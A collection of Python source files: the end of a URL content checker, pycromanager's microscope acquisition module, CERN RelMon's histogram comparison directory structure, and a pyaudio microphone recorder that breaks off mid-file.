t = threading.Thread(target=self.check_one, args=(url,))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
return self.dic
if __name__ == '__main__':
u = 'shai\nshooooooo\nhttp://www.stopfollow.com/\nhttps://tool.lu/'
p = 'href="http://www.miibeian.gov.cn/"'
k = Check(u,p)
print(k.run())
|
acquire.py
|
import numpy as np
import multiprocessing
import threading
from inspect import signature
import copy
import types
import time
from pycromanager.core import serialize_array, deserialize_array, Bridge
from pycromanager.data import Dataset
import warnings
import os.path
import queue
### These functions outside class to prevent problems with pickling when running them in differnet process
def _event_sending_fn(event_port, event_queue, debug=False):
bridge = Bridge(debug=debug)
event_socket = bridge._connect_push(event_port)
while True:
events = event_queue.get(block=True)
if debug:
print('got event(s):', events)
if events is None:
# Poison, time to shut down
event_socket.send({'events': [{'special': 'acquisition-end'}]})
event_socket.close()
return
event_socket.send({'events': events if type(events) == list else [events]})
if debug:
print('sent events')
def _acq_hook_startup_fn(pull_port, push_port, hook_connected_evt, event_queue, hook_fn, debug):
bridge = Bridge(debug=debug)
push_socket = bridge._connect_push(pull_port)
pull_socket = bridge._connect_pull(push_port)
hook_connected_evt.set()
while True:
event_msg = pull_socket.receive()
if 'special' in event_msg and event_msg['special'] == 'acquisition-end':
push_socket.send({})
push_socket.close()
pull_socket.close()
return
else:
if 'events' in event_msg.keys():
event_msg = event_msg['events'] #convert from sequence
params = signature(hook_fn).parameters
if len(params) == 1 or len(params) == 3:
try:
if len(params) == 1:
new_event_msg = hook_fn(event_msg)
elif len(params) == 3:
new_event_msg = hook_fn(event_msg, bridge, event_queue)
except Exception as e:
warnings.warn('exception in acquisition hook: {}'.format(e))
continue
else:
raise Exception('Incorrect number of arguments for hook function. Must be 1 or 3')
if isinstance(new_event_msg, list):
new_event_msg = {'events': new_event_msg} #convert back to the expected format for a sequence
push_socket.send(new_event_msg)
def _processor_startup_fn(pull_port, push_port, sockets_connected_evt, process_fn, event_queue, debug):
bridge = Bridge(debug=debug)
push_socket = bridge._connect_push(pull_port)
pull_socket = bridge._connect_pull(push_port)
if debug:
print('image processing sockets connected')
sockets_connected_evt.set()
def process_and_sendoff(image_tags_tuple):
if len(image_tags_tuple) != 2:
raise Exception('If image is returned, it must be of the form (pixel, metadata)')
if not image_tags_tuple[0].dtype == pixels.dtype:
raise Exception('Processed image pixels must have same dtype as input image pixels, '
'but instead they were {} and {}'.format(image_tags_tuple[0].dtype, pixels.dtype))
processed_img = {'pixels': serialize_array(image_tags_tuple[0]), 'metadata': image_tags_tuple[1]}
push_socket.send(processed_img)
while True:
message = None
while message is None:
message = pull_socket.receive(timeout=30) #check for new message
if 'special' in message and message['special'] == 'finished':
push_socket.send(message) #Continue propagating the finihsed signal
push_socket.close()
pull_socket.close()
return
metadata = message['metadata']
pixels = deserialize_array(message['pixels'])
image = np.reshape(pixels, [metadata['Height'], metadata['Width']])
params = signature(process_fn).parameters
if len(params) == 2 or len(params) == 4:
processed = None
try:
if len(params) == 2:
processed = process_fn(image, metadata)
elif len(params) == 4:
processed = process_fn(image, metadata, bridge, event_queue)
except Exception as e:
warnings.warn('exception in image processor: {}'.format(e))
continue
else:
raise Exception('Incorrect number of arguments for image processing function, must be 2 or 4')
if processed is None:
continue
if type(processed) == list:
for image in processed:
process_and_sendoff(image)
else:
process_and_sendoff(processed)
class Acquisition(object):
def __init__(self, directory=None, name=None, image_process_fn=None,
pre_hardware_hook_fn=None, post_hardware_hook_fn=None, post_camera_hook_fn=None,
show_display=True, tile_overlap=None, max_multi_res_index=None,
magellan_acq_index=None, magellan_explore=False, process=False, debug=False):
"""
:param directory: saving directory for this acquisition. Required unless an image process function will be
implemented that diverts images from saving
:type directory: str
:param name: Saving name for the acquisition. Required unless an image process function will be
implemented that diverts images from saving
:type name: str
:param image_process_fn: image processing function that will be called on each image that gets acquired.
Can either take two arguments (image, metadata) where image is a numpy array and metadata is a dict
containing the corresponding iamge metadata. Or a 4 argument version is accepted, which accepts (image,
metadata, bridge, queue), where bridge and queue are an instance of the pycromanager.acquire.Bridge
object for the purposes of interacting with arbitrary code on the Java side (such as the micro-manager
core), and queue is a Queue objects that holds upcomning acquisition events. Both version must either
return
:param pre_hardware_hook_fn: hook function that will be run just before the hardware is updated before acquiring
a new image. In the case of hardware sequencing, it will be run just before a sequence of instructions are
dispatched to the hardware. Accepts either one argument (the current acquisition event) or three arguments
(current event, bridge, event Queue)
:param post_hardware_hook_fn: hook function that will be run just before the hardware is updated before acquiring
a new image. In the case of hardware sequencing, it will be run just after a sequence of instructions are
dispatched to the hardware, but before the camera sequence has been started. Accepts either one argument
(the current acquisition event) or three arguments (current event, bridge, event Queue)
:param post_camera_hook_fn: hook function that will be run just after the camera has been triggered to snapImage or
startSequence. A common use case for this hook is when one want to send TTL triggers to the camera from an
external timing device that synchronizes with other hardware. Accepts either one argument (the current
acquisition event) or three arguments (current event, bridge, event Queue)
:param tile_overlap: If given, XY tiles will be laid out in a grid and multi-resolution saving will be
actived. Argument can be a two element tuple describing the pixel overlaps between adjacent
tiles. i.e. (pixel_overlap_x, pixel_overlap_y), or an integer to use the same overlap for both.
For these features to work, the current hardware configuration must have a valid affine transform
between camera coordinates and XY stage coordinates
:type tile_overlap: tuple, int
:param max_multi_res_index: Maximum index to downsample to in multi-res pyramid mode. 0 is no downsampling,
1 is downsampled up to 2x, 2 is downsampled up to 4x, etc. If not provided, it will be dynamically
calculated and updated from data
:type max_multi_res_index: int
:param show_display: show the image viewer window
:type show_display: boolean
:param magellan_acq_index: run this acquisition using the settings specified at this position in the main
GUI of micro-magellan (micro-manager plugin). This index starts at 0
:type magellan_acq_index: int
:param magellan_explore: Run a Micro-magellan explore acquisition
:type magellan_explore: bool
:param process: Use multiprocessing instead of multithreading for acquisition hooks and image
processors. This can be used to speed up CPU-bounded processing by eliminating bottlenecks
caused by Python's Global Interpreter Lock, but also creates complications on Windows-based
systems
:type process: boolean
:param debug: print debugging stuff
:type debug: boolean
"""
self.bridge = Bridge(debug=debug)
self._debug = debug
self._dataset = None
if directory is not None:
# Expend ~ in path
directory = os.path.expanduser(directory)
# If path is relative, retain knowledge of the current working directory
directory = os.path.abspath(directory)
if magellan_acq_index is not None:
magellan_api = self.bridge.get_magellan()
self._remote_acq = magellan_api.create_acquisition(magellan_acq_index)
self._event_queue = None
elif magellan_explore:
magellan_api = self.bridge.get_magellan()
self._remote_acq = magellan_api.create_explore_acquisition()
self._event_queue = None
else:
# Create thread safe queue for events so they can be passed from multiple processes
self._event_queue = multiprocessing.Queue() if process else queue.Queue()
core = self.bridge.get_core()
acq_factory = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcquisitionFactory', args=[core])
show_viewer = show_display and (directory is not None and name is not None)
if tile_overlap is None:
#argument placeholders, these wont actually be used
x_overlap = 0
y_overlap = 0
else:
if type(tile_overlap) is tuple:
x_overlap, y_overlap = tile_overlap
else:
x_overlap = tile_overlap
y_overlap = tile_overlap
self._remote_acq = acq_factory.create_acquisition(directory, name, show_viewer, tile_overlap is not None,
x_overlap, y_overlap,
max_multi_res_index if max_multi_res_index is not None else -1)
storage = self._remote_acq.get_data_sink()
if storage is not None:
self.disk_location = storage.get_disk_location()
if image_process_fn is not None:
processor = self.bridge.construct_java_object('org.micromanager.remote.RemoteImageProcessor')
self._remote_acq.add_image_processor(processor)
self._start_processor(processor, image_process_fn, self._event_queue, process=process)
if pre_hardware_hook_fn is not None:
hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook', args=[self._remote_acq])
self._start_hook(hook, pre_hardware_hook_fn, self._event_queue, process=process)
self._remote_acq.add_hook(hook, self._remote_acq.BEFORE_HARDWARE_HOOK)
if post_hardware_hook_fn is not None:
hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook', args=[self._remote_acq])
self._start_hook(hook, post_hardware_hook_fn, self._event_queue, process=process)
self._remote_acq.add_hook(hook, self._remote_acq.AFTER_HARDWARE_HOOK)
if post_camera_hook_fn is not None:
hook = self.bridge.construct_java_object('org.micromanager.remote.RemoteAcqHook', args=[self._remote_acq])
self._start_hook(hook, post_camera_hook_fn, self._event_queue, process=process)
self._remote_acq.add_hook(hook, self._remote_acq.AFTER_CAMERA_HOOK)
self._remote_acq.start()
if magellan_acq_index is None and not magellan_explore:
self.event_port = self._remote_acq.get_event_port()
self.event_process = threading.Thread(target=_event_sending_fn,
args=(self.event_port, self._event_queue, self._debug),
name='Event sending')
self.event_process.start()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._event_queue is not None: #magellan acquisitions dont have this
# this should shut down storage and viewer as apporpriate
self._event_queue.put(None)
#now wait on it to finish
self.await_completion()
def get_dataset(self):
"""
Return a :class:`~pycromanager.data.Dataset` object that has access to the underlying pixels
:return: :class:`~pycromanager.data.Dataset` corresponding to this acquisition
"""
if self._dataset is None:
self._dataset = Dataset(remote_storage=self._remote_acq.get_storage())
return self._dataset
def await_completion(self):
"""
Wait for acquisition to finish and resources to be cleaned up
"""
while (not self._remote_acq.is_finished()):
time.sleep(0.1)
def acquire(self, events, keep_shutter_open=False):
"""
Submit an event or a list of events for acquisition. Optimizations (i.e. taking advantage of
hardware synchronization, where available), will take place across this list of events, but not
over multiple calls of this method. A single event is a python dictionary with a specific structure
:param events: single event (i.e. a dictionary) or a list of events
:param keep_shutter_open: dont close and repoen the shutter between events
"""
if keep_shutter_open and isinstance(events, list):
for e in events:
e['keep_shutter_open'] = True
events.append({'keep_shutter_open': False}) #return to autoshutter, dont acquire an image
elif keep_shutter_open and isinstance(events, dict):
events['keep_shutter_open'] = True
events = [events, {'keep_shutter_open': False}] #return to autoshutter, dont acquire an image
self._event_queue.put(events)
def _start_hook(self, remote_hook, remote_hook_fn, event_queue, process):
hook_connected_evt = multiprocessing.Event() if process else threading.Event()
pull_port = remote_hook.get_pull_port()
push_port = remote_hook.get_push_port()
hook_thread = (multiprocessing.Process if process else threading.Thread)(
target=_acq_hook_startup_fn, name='AcquisitionHook',
args=(pull_port, push_port, hook_connected_evt, event_queue, remote_hook_fn, self._debug))
# if process else threading.Thread(target=_acq_hook_fn, args=(), name='AcquisitionHook')
hook_thread.start()
hook_connected_evt.wait() # wait for push/pull sockets to connect
def _start_processor(self, processor, process_fn, event_queue, process):
# this must start first
processor.start_pull()
sockets_connected_evt = multiprocessing.Event() if process else threading.Event()
pull_port = processor.get_pull_port()
push_port = processor.get_push_port()
self.processor_thread = (multiprocessing.Process if process else threading.Thread)(
target=_processor_startup_fn, args=(pull_port, push_port, sockets_connected_evt,
process_fn, event_queue, self._debug), name='ImageProcessor')
self.processor_thread.start()
sockets_connected_evt.wait() # wait for push/pull sockets to connect
processor.start_push()
def multi_d_acquisition_events(num_time_points=1, time_interval_s=0, z_start=None, z_end=None, z_step=None,
channel_group=None, channels=None, channel_exposures_ms=None, xy_positions=None, order='tpcz',
keep_shutter_open_between_channels=False, keep_shutter_open_between_z_steps=False):
"""
Convenience function for generating the events of a typical multi-dimensional acquisition (i.e. an
acquisition with some combination of multiple timepoints, channels, z-slices, or xy positions)
:param num_time_points: How many time points if it is a timelapse
:type num_time_points: int
:param time_interval_s: the minimum interval between consecutive time points in seconds. Keep at 0 to go as
fast as possible
:type time_interval_s: float
:param z_start: z-stack starting position, in µm
:type z_start: float
:param z_end: z-stack ending position, in µm
:type z_end: float
:param z_step: step size of z-stack, in µm
:type z_step: float
:param channel_group: name of the channel group (which should correspond to a config group in micro-manager)
:type channel_group: str
:param channels: list of channel names, which correspond to possible settings of the config group (e.g. ['DAPI',
'FITC'])
:type channels: list of strings
:param channel_exposures_ms: list of camera exposure times corresponding to each channel. The length of this list
should be the same as the the length of the list of channels
:type channel_exposures_ms: list of floats or ints
:param xy_positions: N by 2 numpy array where N is the number of XY stage positions, and the 2 are the X and Y
coordinates
:type xy_positions: numpy array
:param order: string that specifies the order of different dimensions. Must have some ordering of the letters
c, t, p, and z. For example, 'tcz' would run a timelapse where z stacks would be acquired at each channel in
series. 'pt' would move to different xy stage positions and run a complete timelapse at each one before moving
to the next
:type order: str
:param keep_shutter_open_between_channels: don't close the shutter in between channels
:type keep_shutter_open_between_channels: bool
:param keep_shutter_open_between_z_steps: don't close the shutter during steps of a z stack
:type keep_shutter_open_between_z_steps: bool
:return: a list of acquisition events to run the specified acquisition
"""
def generate_events(event, order):
if len(order) == 0:
yield event
return
elif order[0] == 't' and num_time_points != 1:
time_indices = np.arange(num_time_points)
for time_index in time_indices:
new_event = copy.deepcopy(event)
new_event['axes']['time'] = time_index
if time_interval_s != 0:
new_event['min_start_time'] = time_index * time_interval_s
yield generate_events(new_event, order[1:])
elif order[0] == 'z' and z_start is not None and z_end is not None and z_step is not None:
z_positions = np.arange(z_start, z_end, z_step)
for z_index, z_position in enumerate(z_positions):
new_event = copy.deepcopy(event)
new_event['axes']['z'] = z_index
new_event['z'] = z_position
if keep_shutter_open_between_z_steps:
new_event['keep_shutter_open'] = True
yield generate_events(new_event, order[1:])
elif order[0] == 'p' and xy_positions is not None:
for p_index, xy in enumerate(xy_positions):
new_event = copy.deepcopy(event)
new_event['axes']['position'] = p_index
new_event['x'] = xy[0]
new_event['y'] = xy[1]
yield generate_events(new_event, order[1:])
elif order[0] == 'c' and channel_group is not None and channels is not None:
for i in range(len(channels)):
new_event = copy.deepcopy(event)
new_event['channel'] = {'group': channel_group, 'config': channels[i]}
if channel_exposures_ms is not None:
new_event['exposure'] = i
if keep_shutter_open_between_channels:
new_event['keep_shutter_open'] = True
yield generate_events(new_event, order[1:])
else:
#this axis appears to be missing
yield generate_events(event, order[1:])
#collect all events into a single list
base_event = {'axes': {}}
events = []
def appender(next):
if isinstance(next, types.GeneratorType):
for n in next:
appender(n)
else:
events.append(next)
appender(generate_events(base_event, order))
return events
|
dirstructure.py
|
from __future__ import print_function
from __future__ import absolute_import
################################################################################
# RelMon: a tool for automatic Release Comparison
# https://twiki.cern.ch/twiki/bin/view/CMSPublic/RelMon
#
#
#
# Danilo Piparo CERN - danilo.piparo@cern.ch
#
################################################################################
from builtins import range
from array import array
from copy import deepcopy
from os import chdir,getcwd,listdir,makedirs,rmdir
from os.path import exists,join
import sys
argv=sys.argv
from ROOT import *
sys.argv=argv
from .definitions import *
from .utils import setTDRStyle
# Something nice and familiar
setTDRStyle()
# Do not display the canvases
gROOT.SetBatch(kTRUE)
#-------------------------------------------------------------------------------
_log_level=5
def logger(msg_level,message):
if msg_level>=_log_level:
print("[%s] %s" %(asctime(),message))
#-------------------------------------------------------------------------------
class Weighted(object):
def __init__(self,name,weight=1):
self.name=name
self.weight=weight
#-------------------------------------------------------------------------------
class CompInfo(object):
def __init__(self,sample1="",sample2="",release1="",release2="",run1="",run2="",tier1=0,tier2=0):
self.sample1=sample1
self.sample2=sample2
self.release1=release1
self.release2=release2
self.run1=run1
self.run2=run2
self.tier1=tier1
self.tier2=tier2
#-------------------------------------------------------------------------------
class Directory(Weighted):
def __init__(self,name,mother_dir="",meta=CompInfo(),draw_success=False,do_pngs=False):
self.mother_dir=mother_dir
self.meta=meta
self.subdirs=[]
self.comparisons=[]
self.n_fails=0
self.n_successes=0
self.n_nulls=0
self.n_skiped = 0
self.n_comp_skiped = 0
self.n_comp_fails=0
self.n_comp_successes=0
self.n_comp_nulls=0
self.weight=0
self.stats_calculated=False
Weighted.__init__(self,name)
self.draw_success=draw_success
self.do_pngs=do_pngs
self.rank_histo=TH1I("rh%s"%name,"",50,-0.01,1.001)
self.rank_histo.SetDirectory(0)
self.different_histograms = {}
self.different_histograms['file1']= {}
self.different_histograms['file2']= {}
self.filename1 = ""
self.filename2 = ""
self.n_missing_objs = 0
self.full_path = ""
def is_empty(self):
if len(self.subdirs)==0 and len(self.comparisons)==0:
return True
return False
def calcStats(self,make_pie=True):
'''Walk all subdirs and calculate weight,fails and successes.
Moreove propagate the sample and releases names.
'''
if self.stats_calculated:
return 0
self.n_fails=0
self.n_successes=0
self.n_nulls=0
self.n_comp_fails=0
self.n_comp_successes=0
self.n_comp_nulls=0
self.weight=0
self.n_skiped = 0
self.n_comp_skiped = 0
self.n_missing_objs = len(self.different_histograms['file1'])+len(self.different_histograms['file2'])
if self.n_missing_objs != 0:
print(" [*] Missing in %s: %s" %(self.filename1, self.different_histograms['file1']))
print(" [*] Missing in %s: %s" %(self.filename2, self.different_histograms['file2']))
# clean from empty dirs
self.subdirs = [subdir for subdir in self.subdirs if not subdir.is_empty()]
for comp in self.comparisons:
if comp.status == SKIPED: #in case its in black list & skiped
self.n_skiped += 1
self.n_comp_skiped += 1
self.weight+=1
else: #else original code -> to check for Fails and Successes
self.rank_histo.Fill(comp.rank)
self.weight+=1
if comp.status == FAIL:
self.n_fails+=1
self.n_comp_fails+=1
elif comp.status == SUCCESS:
self.n_successes+=1
self.n_comp_successes+=1
else:
self.n_nulls+=1
self.n_comp_nulls+=1
for subdir in self.subdirs:
subdir.mother_dir=join(self.mother_dir,self.name)
subdir.full_path = join(self.mother_dir,self.name).replace("/Run summary","")
subdir.calcStats(make_pie)
subdir.meta=self.meta
self.weight+=subdir.weight
self.n_fails+=subdir.n_fails
self.n_successes+=subdir.n_successes
self.n_nulls+=subdir.n_nulls
self.n_skiped+=subdir.n_skiped
self.n_missing_objs += subdir.n_missing_objs
self.rank_histo.Add(subdir.rank_histo)
self.stats_calculated=True
self.full_path = join(self.mother_dir,self.name).replace("/Run summary","")
#if make_pie:
#self.__create_pie_image()
def get_subdirs_dict(self):
subdirdict={}
for subdir in self.subdirs:
subdirdict[subdir.name]=subdir
return subdirdict
def get_subdirs_names(self):
subdirnames=[]
for subdir in self.subdirs:
subdirnames.append(subdir.name)
return subdirnames
def get_summary_chart_ajax(self,w=400,h=300):
"""Emit the ajax to build a pie chart using google apis...
"""
url = "https://chart.googleapis.com/chart?"
url+= "cht=p3" # Select the 3d chart
#url+= "&chl=Success|Null|Fail" # give labels
url+= "&chco=00FF00|FFFF00|FF0000|7A7A7A" # give colours to labels
url+= "&chs=%sx%s" %(w,h)
#url+= "&chtt=%s" %self.name
url+= "&chd=t:%.2f,%.2f,%.2f,%.2f"%(self.get_success_rate(),self.get_null_rate(),self.get_fail_rate(),self.get_skiped_rate())
return url
def print_report(self,indent="",verbose=False):
if len(indent)==0:
self.calcStats(make_pie=False)
# print small failure report
if verbose:
fail_comps=[comp for comp in self.comparisons if comp.status==FAIL]
fail_comps=sorted(fail_comps,key=lambda comp:comp.name )
if len(fail_comps)>0:
print(indent+"* %s/%s:" %(self.mother_dir,self.name))
for comp in fail_comps:
print(indent+" - %s: %s Test Failed (pval = %s) " %(comp.name,comp.test_name,comp.rank))
for subdir in self.subdirs:
subdir.print_report(indent+" ",verbose)
if len(indent)==0:
print("\n%s - summary of %s tests:" %(self.name,self.weight))
print(" o Failiures: %.2f%% (%s/%s)" %(self.get_fail_rate(),self.n_fails,self.weight))
print(" o Nulls: %.2f%% (%s/%s) " %(self.get_null_rate(),self.n_nulls,self.weight))
print(" o Successes: %.2f%% (%s/%s) " %(self.get_success_rate(),self.n_successes,self.weight))
print(" o Skipped: %.2f%% (%s/%s) " %(self.get_skiped_rate(),self.n_skiped,self.weight))
print(" o Missing objects: %s" %(self.n_missing_objs))
def get_skiped_rate(self):
if self.weight == 0: return 0
return 100.*self.n_skiped/self.weight
def get_fail_rate(self):
if self.weight == 0:return 0
return 100.*self.n_fails/self.weight
def get_success_rate(self):
if self.weight == 0:return 1
return 100.*self.n_successes/self.weight
def get_null_rate(self):
if self.weight == 0:return 0
return 100.*self.n_nulls/self.weight
def __get_full_path(self):
#print "Mother is %s" %self.mother_dir
if len(self.mother_dir)==0:
return self.name
return join(self.mother_dir,self.name)
def __create_on_disk(self):
if not exists(self.mother_dir) and len(self.mother_dir)!=0:
makedirs(self.mother_dir)
full_path=self.__get_full_path()
if not exists(full_path) and len(full_path)>0:
makedirs(full_path)
def get_summary_chart_name(self):
return join(self.__get_full_path(),"summary_chart.png")
def __create_pie_image(self):
self.__create_on_disk()
vals=[]
colors=[]
for n,col in zip((self.n_fails,self.n_nulls,self.n_successes,self.n_skiped),(kRed,kYellow,kGreen,kBlue)):
if n!=0:
vals.append(n)
colors.append(col)
valsa=array('f',vals)
colorsa=array('i',colors)
can = TCanvas("cpie","TPie test",100,100);
try:
pie = TPie("ThePie",self.name,len(vals),valsa,colorsa);
label_n=0
if self.n_fails!=0:
pie.SetEntryLabel(label_n, "Fail: %.1f(%i)" %(self.get_fail_rate(),self.n_fails) );
label_n+=1
if self.n_nulls!=0:
pie.SetEntryLabel(label_n, "Null: %.1f(%i)" %(self.get_null_rate(),self.n_nulls) );
label_n+=1
if self.n_successes!=0:
pie.SetEntryLabel(label_n, "Success: %.1f(%i)" %(self.get_success_rate(),self.n_successes) );
if self.n_skiped!=0:
pie.SetEntryLabel(label_n, "Skipped: %.1f(%i)" %(self.get_skiped_rate(),self.n_skiped));
pie.SetY(.52);
pie.SetAngularOffset(0.);
pie.SetLabelsOffset(-.3);
#pie.SetLabelFormat("#splitline{%val (%perc)}{%txt}");
pie.Draw("3d nol");
can.Print(self.get_summary_chart_name());
except:
print("self.name = %s" %self.name)
print("len(vals) = %s (vals=%s)" %(len(vals),vals))
print("valsa = %s" %valsa)
print("colorsa = %s" %colorsa)
def prune(self,expandable_dir):
"""Eliminate from the tree the directory the expandable ones.
"""
#print "pruning %s" %self.name
exp_index=-1
counter=0
for subdir in self.subdirs:
# Eliminate any trace of the expandable path in the mother directories
# for depths higher than 1
subdir.mother_dir=subdir.mother_dir.replace("/"+expandable_dir,"")
if subdir.name==expandable_dir:
exp_index=counter
counter+=1
# Did we find an expandable?
if exp_index>=0:
exp_dir=self.subdirs[exp_index]
for subsubdir in exp_dir.subdirs:
#print "*******",subsubdir.mother_dir,
subsubdir.mother_dir=subsubdir.mother_dir.replace("/"+expandable_dir,"")
while "//" in subsubdir.mother_dir:
print(subsubdir.mother_dir)
subsubdir.mother_dir=subsubdir.mother_dir.replace("//","/")
#print "*******",subsubdir.mother_dir
self.subdirs.append(subsubdir)
for comp in exp_dir.comparisons:
comp.mother_dir=comp.mother_dir.replace("/"+expandable_dir,"")
while "//" in comp.mother_dir:
comp.mother_dir
comp.mother_dir=comp.mother_dir.replace("/")
if not comp in self.comparisons: #in case not to append same comparisons few times
self.comparisons.append(comp) # add a comparison
self.n_comp_fails = exp_dir.n_comp_fails #copy to-be removed directory
self.n_comp_nulls = exp_dir.n_comp_nulls # numbers to parent directory
self.n_comp_successes = exp_dir.n_comp_successes
self.n_comp_skiped = exp_dir.n_comp_skiped
del self.subdirs[exp_index]
self.prune(expandable_dir)
for subdir in self.subdirs:
subdir.prune(expandable_dir)
def __repr__(self):
if self.is_empty():
return "%s seems to be empty. Please check!" %self.name
content="%s , Rates: Success %.2f%%(%s) - Fail %.2f%%(%s) - Null %.2f%%(%s)\n" %(self.name,self.get_success_rate(),self.n_successes,self.get_fail_rate(),self.n_fails,self.get_null_rate(),self.n_nulls)
for subdir in self.subdirs:
content+=" %s\n" % subdir
for comp in self.comparisons:
content+=" %s\n" % comp
return content
#-------------------------------------------------------------------------------
from multiprocessing import Process
def print_multi_threaded(canvas,img_name):
canvas.Print(img_name)
tcanvas_print_processes=[]
#-------------------------------------------------------------------------------
class Comparison(Weighted):
canvas_xsize=500
canvas_ysize=400
def __init__(self,name,mother_dir,h1,h2,stat_test,draw_success=False,do_pngs=False, skip=False):
self.name=name
self.png_name="placeholder.png"
self.mother_dir=mother_dir
self.img_name=""
#self.draw_success=draw_success
Weighted.__init__(self,name)
stat_test.set_operands(h1,h2)
if skip:
self.status = SKIPED
self.test_name=stat_test.name
self.test_name=stat_test.name
self.test_thr=stat_test.threshold
self.rank = 0
else:
self.status=stat_test.get_status()
self.rank=stat_test.get_rank()
self.test_name=stat_test.name
self.test_thr=stat_test.threshold
self.do_pngs=do_pngs
self.draw_success=draw_success or not do_pngs
if ((self.status==FAIL or self.status==NULL or self.status == SKIPED or self.draw_success) and self.do_pngs):
self.__make_image(h1,h2)
#self.__make_image(h1,h2)
def __make_img_dir(self):
if not exists(self.mother_dir):
makedirs(self.mother_dir)
def __get_img_name(self):
#self.__make_img_dir()
#print "MOTHER: ",self.mother_dir
self.img_name="%s/%s.png"%(self.mother_dir,self.name)
self.img_name=self.img_name.replace("Run summary","")
self.img_name=self.img_name.replace("/","_")
self.img_name=self.img_name.strip("_")
#print "IMAGE NAME: %s " %self.img_name
return self.img_name
def tcanvas_slow(self,canvas):
#print "About to print %s" %self.img_name
#print_multi_threaded(canvas,self.img_name)
#print "-->Printed"
p = Process(target=print_multi_threaded, args=(canvas,self.img_name))
p.start()
tcanvas_print_processes.append(p)
n_proc=len(tcanvas_print_processes)
if n_proc>3:
p_to_remove=[]
for iprocess in range(0,n_proc):
p=tcanvas_print_processes[iprocess]
p.join()
p_to_remove.append(iprocess)
adjustment=0
for iprocess in p_to_remove:
tcanvas_print_processes.pop(iprocess-adjustment)
adjustment+=1
def __make_image(self,obj1,obj2):
self.img_name=self.__get_img_name()
if self.rank==-1:
return 0
canvas=TCanvas(self.name,self.name,Comparison.canvas_xsize,Comparison.canvas_ysize)
objs=(obj1,obj2)
# Add some specifics for the graphs
obj1.SetTitle(self.name)
if obj1.GetNbinsY()!=0 and not "2" in obj1.ClassName() :
obj1 .SetLineWidth(2)
obj2 .SetLineWidth(2)
obj1.SetMarkerStyle(8)
obj1.SetMarkerSize(.8)
obj2.SetMarkerStyle(8)
obj2.SetMarkerSize(.8)
obj1.SetMarkerColor(kBlue)
obj1.SetLineColor(kBlue)
obj2.SetMarkerColor(kRed)
obj2.SetLineColor(kRed)
obj1.Draw("EP")
#Statsbox
obj2.Draw("HistSames")
#gPad.Update()
#if 'stats' in map(lambda o: o.GetName(),list(gPad.GetListOfPrimitives())):
#st = gPad.GetPrimitive("stats")
#st.SetY1NDC(0.575)
#st.SetY2NDC(0.735)
#st.SetLineColor(kRed)
#st.SetTextColor(kRed)
#print st
else:
obj1.Draw("Colz")
gPad.Update()
#if 'stats' in map(lambda o: o.GetName(),list(gPad.GetListOfPrimitives())):
#st = gPad.GetPrimitive("stats")
#st.SetY1NDC(0.575)
#st.SetY2NDC(0.735)
#st.SetLineColor(kRed)
#st.SetTextColor(kRed)
#print st
obj2.Draw("ColSame")
# Put together the TLatex for the stat test if possible
color=kGreen+2 # which is green, as everybody knows
if self.status==FAIL:
print("This comparison failed %f" %self.rank)
color=kRed
elif self.status==NULL:
color=kYellow
elif self.status==SKIPED:
color=kBlue #check if kBlue exists ;)
lat_text="#scale[.7]{#color[%s]{%s: %2.2f}}" %(color,self.test_name,self.rank)
lat=TLatex(.1,.91,lat_text)
lat.SetNDC()
lat.Draw()
# Put also the stats together!
n1=obj1.GetEntries()
if n1> 100000:
n1="%e"%n1
else:
n1="%s"%n1
n2=obj2.GetEntries()
if n2> 100000:
n2="%e"%n2
else:
n2="%s"%n2
lat_text1="#scale[.7]{#color[%s]{Entries: %s}}" %(obj1.GetLineColor(),n1)
lat1=TLatex(.3,.91,lat_text1)
lat1.SetNDC()
lat1.Draw()
lat_text2="#scale[.7]{#color[%s]{Entries: %s}}" %(obj2.GetLineColor(),n2)
lat2=TLatex(.6,.91,lat_text2)
lat2.SetNDC()
lat2.Draw()
self.tcanvas_slow(canvas)
def __repr__(self):
return "%s , (%s=%s). IMG=%s. status=%s" %(self.name,self.test_name,self.rank,self.img_name,self.status)
#-------------------------------------------------------------------------------
|
recorder.py
|
# Part of the code has been updated from
# http://www.swharden.com/wp/2013-05-09-realtime-fft-audio-visualization-with-python/
# Author: Scott W Harden: neuroscientist, dentist, molecular biologist, code monkey (2013)
import matplotlib
matplotlib.use('TkAgg') # <-- THIS MAKES IT FAST!
import numpy
import scipy
import struct
import pyaudio
import threading
import pylab
import struct
class SwhRecorder:
"""Simple, cross-platform class to record from the microphone."""
def __init__(self):
"""minimal garb is executed when class is loaded."""
self.BUFFERSIZE=2**13 #1024 is a good buffer size
self.secToRecord=.1
self.threadsDieNow=False
self.newAudio=False
# Set sampling rate (in Hz).
# Typical rates: {8000, 11025, 22050, 44100, 48100} Hz
self.RATE = 44100;
# Choose response type.
# Note: {'fast' = ~125 ms, 'slow' = ~1.0 s}
self.responseType = 'fast';
# Set calibration constant.
# Note: A quite location will be ~55 dBA.
self.C = 50;
def setup(self):
"""initialize sound card."""
#TODO - windows detection vs. alsa or something for linux
#TODO - try/except for sound card selection/initiation
if self.responseType=='slow':
self.secToRecord=1.0
else:
self.secToRecord= 0.125
self.buffersToRecord=int(self.RATE*self.secToRecord/self.BUFFERSIZE)
if self.buffersToRecord==0: self.buffersToRecord=1
self.samplesToRecord=int(self.BUFFERSIZE*self.buffersToRecord)
self.chunksToRecord=int(self.samplesToRecord/self.BUFFERSIZE)
self.secPerPoint=1.0/self.RATE
self.p = pyaudio.PyAudio()
self.inStream = self.p.open(format=pyaudio.paFloat32,channels=1,rate=self.RATE,input=True,frames_per_buffer=self.BUFFERSIZE)
self.xsBuffer=numpy.arange(self.BUFFERSIZE)*self.secPerPoint
self.xs=numpy.arange(self.chunksToRecord*self.BUFFERSIZE)*self.secPerPoint
self.audio=numpy.empty((self.chunksToRecord*self.BUFFERSIZE),dtype=numpy.float32)
def close(self):
"""cleanly back out and release sound card."""
self.p.close(self.inStream)
### RECORDING AUDIO ###
def getAudio(self):
"""get a single buffer size worth of audio."""
audioString=self.inStream.read(self.BUFFERSIZE)
return numpy.fromstring(audioString,dtype=numpy.float32)
def record(self,forever=True):
"""record secToRecord seconds of audio."""
while True:
if self.threadsDieNow: break
for i in range(self.chunksToRecord):
self.audio[i*self.BUFFERSIZE:(i+1)*self.BUFFERSIZE]=self.getAudio()
self.newAudio=True
if forever==False: break
